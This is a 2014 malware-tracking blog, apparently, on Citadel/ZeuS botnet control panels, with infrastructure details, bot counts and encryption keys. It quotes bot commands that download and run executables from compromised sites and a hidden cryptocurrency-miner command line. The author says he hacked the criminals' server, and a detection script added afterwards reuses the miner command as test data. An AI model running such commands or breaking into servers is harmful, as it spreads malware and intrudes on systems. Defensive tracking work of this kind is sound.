Monday, May 26, 2014

hsbconlineuk.com Citadel/Zeus Service

Citadel and Zeus control panels were posted on Cybercrime-Tracker. 
I'm on holiday today (thanks troops), and this server is hosted in America (not on my watch), so I'll take a look at it. 

I observed this C&C on May 26th. According to log files, it had been operating since at least March 30th 2014.

hsbconlineuk.com. 14400 IN A 198.176.28.49

NetRange:       198.176.28.0 - 198.176.31.255
CIDR:           198.176.28.0/22
OriginAS:       AS46785
NetName:        QUASAR-DATA-CENTER
NetHandle:      NET-198-176-28-0-1
Parent:         NET-198-0-0-0-0
NetType:        Direct Allocation

The panels were a mixed variety of Citadel and ZeuS, in the 'images' directory:

Looks like Nigerian names.

After I contacted the NOC and abuse emails, I hacked the server and was going through the control panels taking screenshots, gathering evidence.

hxxp://hsbconlineuk.com/images/ada/cp.php
94 bots

Seemed like a pretty boring setup, but it started acting odd.

Then I got a funny message:

Awesome.

Details

ala/cp.php
93 bots

BuckC
57 bots

Ebuka
0 bots

ija
33 bots

Other:
.contactemail 
cushlilly@gmail.com
.lastlog
37.221.161.234
inetnum: 37.221.161.232 - 37.221.161.239
netname: FVDE
descr: Tor Exit Node Hosting
country: RO

That contact email belongs to a known 419 scammer.

Zenith Bank (fake bank)
http://db.aa419.org/fakebanksview.php?key=82051

http://bgp.he.net/dns/merchantspeedaircourier.com#_whois

http://www.whoismind.com/whois/franchiseclearing-exchange.com.html


Friday, May 9, 2014

saudeodontos.com.br - Citadel

Citadel botnet C&C server listed on ZeuS Tracker

https://zeustracker.abuse.ch/monitor.php?host=saudeodontos.com.br

saudeodontos.com.br
200.98.246.214
inetnum:     200.98/16
aut-num:     AS15201
abuse-c:     SEO50
owner:       Universo Online S.A.
ownerid:     001.109.184/0001-95
responsible: Contato da Entidade UOL
country:     BR

Login:

Home (132 bots)

Scripts
user_execute hxxp://hopper.nl/images/2014/1/droper.exe
user_execute hxxp://hopper.nl/images/2014/1/1.exe

https://malwr.com/analysis/MWYyOGZkYTA0N2FhNDE4YmI4NjljZGU5Nzc0Mjc3Yjc/
https://malwr.com/analysis/ZjJmZWU0NzNhNDZlNDdlZDhlNTRlYzBjYzEzNzY1ODM/

Encryption Key:
78fghrYU%^&$ER

Same encryption key observed here:
http://protectyournet.blogspot.com/2014/05/saudevitalsuplementoscom-citadel.html

saudevitalsuplementos.com - Citadel

Citadel botnet
https://zeustracker.abuse.ch/monitor.php?host=www.saudevitalsuplementos.com


saudevitalsuplementos.com
200.98.197.107
aut-num:     AS15201
abuse-c:     SEO50
owner:       Universo Online S.A.

Login:

Home (15 bots)

Scripts:
user_execute hxxp://ozibiza.com/plugins/editors/codemirror/pics/musics/musicse.exe
user_execute hxxp://ozibiza.com/plugins/editors/codemirror/pics/imgs/setup.exe

https://malwr.com/analysis/MGU3OWU5MmIwYjkzNGY4MzkxYjQxZjUyODljMTFkZjA/
https://malwr.com/analysis/ZWU1NTM2NTZhOTI2NDQwZTk5ZTQ2YmM3NjJjNzQ0NDk/

b6e0e6bf92456476d0d1d813274192b0
drops this: 8FEE9A2354B3646A94DAEDB08B731DDA
(this binary has code for a miner found here: http://ufasoft.com/coin/)
Command line: C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\vbc.exe -o http://super777.truemyenergy:x@dog.ltcoin.net:8016 -t 3 -T 83 -a scrypt -g no -I 0

cf9ea8b950fce64b5f37212f1d34e3fd (VT 35/50)

These MD5s turn up all over.
Russian file names like "VKontakte" (the Russian Facebook).

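As an added defender-side example (not code from the original post), the following Python triages Sysmon-style process-creation records for the pattern in the command line above: a signed .NET compiler such as vbc.exe running with pool-miner switches (a -o pool URL carrying worker credentials, -a scrypt, -t threads). The field names, the list of expected build parents and the second sample record are assumptions constructed for this example; the first record reuses the vbc.exe command line from the post.

```python
import ntpath
import re
import shlex

# .NET compiler binaries that are handy targets for process hollowing: signed,
# present on every Windows box, and rarely launched outside a build.
DOTNET_COMPILERS = {"vbc.exe", "csc.exe", "jsc.exe"}
EXPECTED_PARENTS = {"msbuild.exe", "devenv.exe"}  # assumed legitimate build parents
# ufasoft-style pool miner switches: -o <pool url>, -a <algorithm>, -t <threads>
POOL_URL = re.compile(r"^(?:stratum\+tcp|https?)://(?:[^@\s]+@)?[\w.-]+:\d{2,5}$", re.I)
MINER_ALGO = re.compile(r"^(?:scrypt|sha256d?|x11|keccak)$", re.I)

def miner_indicators(cmdline):
    """Return the miner-style switches found in a command line (empty if none)."""
    toks = shlex.split(cmdline, posix=False)  # posix=False keeps Windows backslashes
    hits = []
    for i, tok in enumerate(toks):
        nxt = toks[i + 1] if i + 1 < len(toks) else ""
        if tok == "-o" and POOL_URL.match(nxt):
            hits.append("pool url " + nxt)
            if "@" in nxt:
                hits.append("worker credentials embedded in pool url")
        elif tok == "-a" and MINER_ALGO.match(nxt):
            hits.append("hash algorithm " + nxt)
        elif tok == "-t" and nxt.isdigit():
            hits.append("thread count " + nxt)
    return hits

def assess(event):
    """Flag a process-creation event where a .NET compiler carries miner arguments."""
    image = ntpath.basename(event["Image"]).lower()
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    reasons = []
    if image in DOTNET_COMPILERS:
        reasons = miner_indicators(event["CommandLine"])
        if reasons and parent not in EXPECTED_PARENTS:
            reasons.append("launched by unexpected parent " + (parent or "<unknown>"))
    return {"image": image, "suspicious": len(reasons) >= 2, "reasons": reasons}

# Constructed Sysmon-style sample events. The first reuses the vbc.exe command
# line from the post above; the second is an ordinary compiler run under MSBuild.
SAMPLE_EVENTS = [
    {"Image": r"C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\vbc.exe",
     "ParentImage": r"C:\Users\victim\AppData\Local\Temp\setup.exe",
     "CommandLine": r"C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\vbc.exe -o http://super777.truemyenergy:x@dog.ltcoin.net:8016 -t 3 -T 83 -a scrypt -g no -I 0"},
    {"Image": r"C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\vbc.exe",
     "ParentImage": r"C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe",
     "CommandLine": r"C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\vbc.exe /noconfig /nologo @C:\build\obj\app.rsp"},
]
```

The real vbc.exe never takes these switches, so a single hit on a compiler image is already worth a look; the two-indicator threshold just keeps noise down when the rule is run over a whole fleet.
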
Encryption Key:
78fghrYU%^&$ER

Same encryption key observed here:
http://protectyournet.blogspot.com/2014/05/saudeodontoscombr-citadel.html